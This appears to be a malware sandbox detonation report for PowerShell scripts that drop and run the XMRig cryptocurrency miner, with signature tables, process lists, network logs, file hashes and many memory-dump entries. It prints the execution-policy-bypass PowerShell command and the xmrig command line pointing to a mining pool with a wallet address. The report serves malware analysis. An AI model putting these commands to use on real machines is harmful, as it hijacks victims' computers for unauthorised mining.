memory/924-91-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-92-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/600-93-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/600-94-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/924-96-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-97-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-98-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-99-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-100-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-101-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-102-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-103-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-104-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-105-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-106-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-107-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-108-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-109-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-110-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-111-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-112-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-113-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-114-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-115-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-116-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-117-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-118-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-119-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-120-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-121-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-122-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-123-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-124-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-125-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-126-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-127-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-128-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-129-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-130-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-131-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-132-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-133-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-134-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-135-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-136-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-137-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-138-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-139-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-140-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-141-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-142-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-143-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-144-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-145-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-146-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-147-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-148-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-149-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-150-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-151-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-152-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-153-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-154-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-155-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-156-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win10v2004-20240426-en

Max time kernel

1797s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/1396-0-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jswlmnae.hiq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-10-0x0000022F67E70000-0x0000022F67E92000-memory.dmp

memory/1396-11-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-12-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-14-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-15-0x0000022F68240000-0x0000022F68252000-memory.dmp

memory/1396-16-0x0000022F67430000-0x0000022F6743A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4012-47-0x000002434E1D0000-0x000002434E1F0000-memory.dmp

memory/4012-48-0x000002434F940000-0x000002434F960000-memory.dmp

memory/4012-49-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-51-0x000002434F980000-0x000002434F9A0000-memory.dmp

memory/4012-50-0x000002434F960000-0x000002434F980000-memory.dmp

memory/4012-52-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/1396-53-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-54-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp

memory/4012-55-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/1396-56-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/4012-59-0x000002434F980000-0x000002434F9A0000-memory.dmp

memory/4012-58-0x000002434F960000-0x000002434F980000-memory.dmp

memory/4012-57-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-60-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-61-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-62-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-63-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-64-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-65-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-66-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-67-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-68-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-69-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-70-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-71-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-72-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-73-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-74-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-75-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-76-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-77-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-78-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-79-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-80-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-81-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-82-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-83-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-84-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-85-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-86-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-87-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-88-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-89-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-90-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-91-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-92-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-93-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-94-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-95-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-96-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-97-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-98-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-99-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-100-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-101-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-102-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-103-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-104-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-105-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-106-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-107-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-108-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-109-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-110-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-111-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-112-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-113-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-114-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-115-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-116-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-117-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-118-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:56

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp

memory/5008-5-0x000001AF1A250000-0x000001AF1A272000-memory.dmp

memory/5008-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-9-0x000001AF1A400000-0x000001AF1A476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djgysfnp.xsk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5008-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-48-0x000001AF1A3E0000-0x000001AF1A3F2000-memory.dmp

memory/5008-61-0x000001AF1A3C0000-0x000001AF1A3CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3440-90-0x000001CCB1FE0000-0x000001CCB2000000-memory.dmp

memory/3440-91-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-92-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/5008-93-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp

memory/5008-94-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-95-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/3440-96-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-97-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-98-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-99-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-100-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-101-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-102-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-103-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-104-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-105-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-106-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-107-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-108-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-109-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-110-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-111-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-112-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-113-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-114-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-115-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-116-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-117-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-118-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-119-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-120-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-121-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-122-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-123-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-124-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-125-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-126-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-127-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-128-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-129-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-130-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-131-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-132-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-133-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-134-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-135-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-136-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-137-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-138-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-139-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-140-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-141-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-142-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-143-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-144-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-145-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-146-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-147-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-148-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-149-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-150-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-151-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-152-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-153-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-154-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-155-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

memory/3440-156-0x00007FF7F14C0000-0x00007FF7F20F3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:00

Platform

win11-20240508-en

Max time kernel

1653s

Max time network

1663s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
